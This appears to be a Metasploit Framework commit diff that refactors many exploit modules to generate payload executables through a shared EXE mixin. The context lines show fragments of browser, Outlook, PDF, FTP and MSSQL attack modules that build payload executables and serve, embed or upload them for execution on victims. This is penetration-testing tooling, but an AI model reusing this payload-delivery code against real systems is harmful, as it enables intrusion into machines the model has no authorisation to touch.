convert remaining EXE generation to use the mixin, fixes #2017
git-svn-id: file:///home/svn/framework3/trunk@10389 4d416f70-5f16-0410-b530-b9f4589650daunstable
Joshua Drake
parent
21d88b36c1
commit
19db412383
|
|
@ -16,6 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({ :javascript => false })
|
||||
|
|
@ -136,13 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
else
|
||||
|
||||
if target['Arch'] == ARCH_X86
|
||||
data = Msf::Util::EXE.to_win32pe( framework, payload.encoded ) if target['Platform'] == 'win'
|
||||
data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
|
||||
data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux'
|
||||
elsif target['Arch'] == ARCH_PPC
|
||||
data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
|
||||
end
|
||||
# NOTE: The EXE mixin automagically handles detection of arch/platform
|
||||
data = generate_payload_exe
|
||||
|
||||
if data
|
||||
print_status( "Generated executable to drop (#{data.length} bytes)." )
|
||||
|
|
|
|||
|
|
@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Java
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize( info = {} )
|
||||
super( update_info( info,
|
||||
|
|
@ -103,9 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ]),
|
||||
OptString.new('Template', [ true, "The default executable template to use", File.join(Msf::Config.install_root, "data", "templates", "template_x86_windows.exe") ]),
|
||||
OptString.new('InsertPayload', [ false, "Inject payload into template without affecting executable behavior", nil ])
|
||||
OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
@ -373,17 +372,8 @@ public class #{datastore['APPLETNAME']} extends Applet
|
|||
return
|
||||
end
|
||||
|
||||
if target['Arch'] == ARCH_X86
|
||||
if target['Platform'] == 'win'
|
||||
opts = { :template => datastore['Template'], :insert => datastore['InsertPayload'] }
|
||||
data = Msf::Util::EXE.to_win32pe( framework, payload.encoded, opts )
|
||||
end
|
||||
data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
|
||||
data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux'
|
||||
|
||||
elsif target['Arch'] == ARCH_PPC
|
||||
data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
|
||||
end
|
||||
# NOTE: The EXE mixin automagically handles detection of arch/platform
|
||||
data = generate_payload_exe
|
||||
|
||||
if data
|
||||
print_status( "Generated executable to drop (#{data.length} bytes)." )
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -107,8 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
content = ''
|
||||
if target['Arch'] != ARCH_CMD
|
||||
#Get payload as executable on whatever platform
|
||||
plat = Msf::Module::Platform.find_platform(target['Platform'])
|
||||
binary = Msf::Util::EXE.to_executable(framework, target['Arch'], [plat], payload.encoded)
|
||||
binary = generate_payload_exe
|
||||
|
||||
#Get filename and random variable name for file handle in script
|
||||
fname = rand_text_alpha(3+rand(15))
|
||||
|
|
|
|||
|
|
@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::FtpServer
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -85,13 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Create the executable with our payload
|
||||
print_status("Generating the EXE")
|
||||
@exe_file = generate_payload_exe
|
||||
if target['Platform'] == 'win'
|
||||
@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
|
||||
maldir = "C:\\" # Windows
|
||||
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
|
||||
co = "XP"
|
||||
elsif target['Platform'] == 'linux'
|
||||
@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
|
||||
maldir = "//tmp//" # Linux
|
||||
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
|
||||
co = "LXS"
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
|
||||
nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
|
||||
exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"
|
||||
exe = generate_payload_exe + "\x00"
|
||||
|
||||
|
||||
print_status("Trying to upload #{nam}...")
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -68,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/PAYLOAD/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -89,7 +90,7 @@ compatUI.RunApplication 1, "#{exe_path}", 1
|
|||
|
||||
# (Re-)Generate the EXE payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
exe_data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
exe_data = generate_payload_exe({ :code => p.encoded })
|
||||
|
||||
# Encode variables
|
||||
hcp_str = Rex::Text.to_unescape(hcp_data)
|
||||
|
|
|
|||
|
|
@ -14,8 +14,9 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Seh
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Seh
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
|
|
@ -124,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -85,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
p = regenerate_payload(cli);
|
||||
print_status("Request received from #{cli.peerhost}:#{cli.peerport}...");
|
||||
exe = Msf::Util::EXE.to_win32pe(framework,p.encoded);
|
||||
exe = generate_payload_exe({ :code => p.encoded })
|
||||
#print_status("Building vbs file...");
|
||||
# Build the content that will end up in the .vbs file
|
||||
vbs_content = Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray}
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -61,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -68,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
|
|
|
|||
|
|
@ -175,7 +175,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Sending EXE to #{cli.peerhost}:#{cli.peerport}...")
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
exe = Msf::Util::EXE.to_win32pe(framework, p.encoded)
|
||||
exe = generate_payload_exe({ :code => p.encoded })
|
||||
send_response(cli, exe, { 'Content-Type' => 'application/octet-stream' })
|
||||
|
||||
else
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -123,7 +124,7 @@ function #{func}()
|
|||
|
||||
print_status("Sending payload exe to #{cli.peerhost}:#{cli.peerport}...")
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
|
||||
# send the exe
|
||||
send_response(cli, data,
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -72,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/PAYLOAD/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -64,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -67,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
|
|
|
|||
|
|
@ -20,6 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# This module also sends email
|
||||
include Msf::Exploit::Remote::SMTPDeliver
|
||||
|
||||
# This module generates an EXE
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Outlook ATTACH_BY_REF_ONLY File Execution',
|
||||
|
|
@ -111,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if (request.uri =~ /\.exe$/i)
|
||||
print_status "Sending EXE payload #{cli.peerhost}:#{cli.peerport} ..."
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
end
|
||||
|
|
|
|||
|
|
@ -20,6 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# This module also sends email
|
||||
include Msf::Exploit::Remote::SMTPDeliver
|
||||
|
||||
# This module generates an EXE
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Outlook ATTACH_BY_REF_RESOLVE File Execution',
|
||||
|
|
@ -109,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if (request.uri =~ /\.exe$/i)
|
||||
print_status "Sending EXE payload #{cli.peerhost}:#{cli.peerport} ..."
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
end
|
||||
|
|
|
|||
|
|
@ -16,6 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::PDF_Parse
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -90,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if !(payload_exe and payload_exe.length > 0)
|
||||
print_status("Using '#{datastore['PAYLOAD']}' as payload...")
|
||||
|
||||
payload_exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded)
|
||||
payload_exe = generate_payload_exe
|
||||
file_size = payload_exe.length
|
||||
stream = Rex::Text.zlib_deflate(payload_exe)
|
||||
md5 = Rex::Text.md5(stream)
|
||||
|
|
|
|||
|
|
@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if !(payload_exe and payload_exe.length > 0)
|
||||
print_status("Using '#{datastore['PAYLOAD']}' as payload...")
|
||||
payload_exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded)
|
||||
payload_exe = generate_payload_exe
|
||||
hex_payload = Rex::Text.to_hex(payload_exe)
|
||||
else
|
||||
print_status("Using '#{datastore['EXENAME']}' as payload...")
|
||||
|
|
@ -138,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
endobj = "endobj" << eol
|
||||
|
||||
pdf = "%PDF-1.5" << eol
|
||||
payload_exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded)
|
||||
payload_exe = generate_payload_exe
|
||||
hex_payload = Rex::Text.to_hex(payload_exe)
|
||||
pdf << hex_payload << eol
|
||||
pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize
|
||||
super(
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -61,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
connect
|
||||
|
||||
exe = rand_text_alpha(8) + ".exe"
|
||||
data = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
|
||||
data = generate_payload_exe
|
||||
|
||||
pkt1 = "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B"
|
||||
pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41"
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
|
|
@ -83,7 +84,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Sucessfully authenticated to #{rhost}:#{rport} with user 'sa' and password '#{pass}'")
|
||||
print_status("")
|
||||
|
||||
mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded))
|
||||
exe = generate_payload_exe
|
||||
mssql_upload_exec(exe)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
Loading…
Reference in New Issue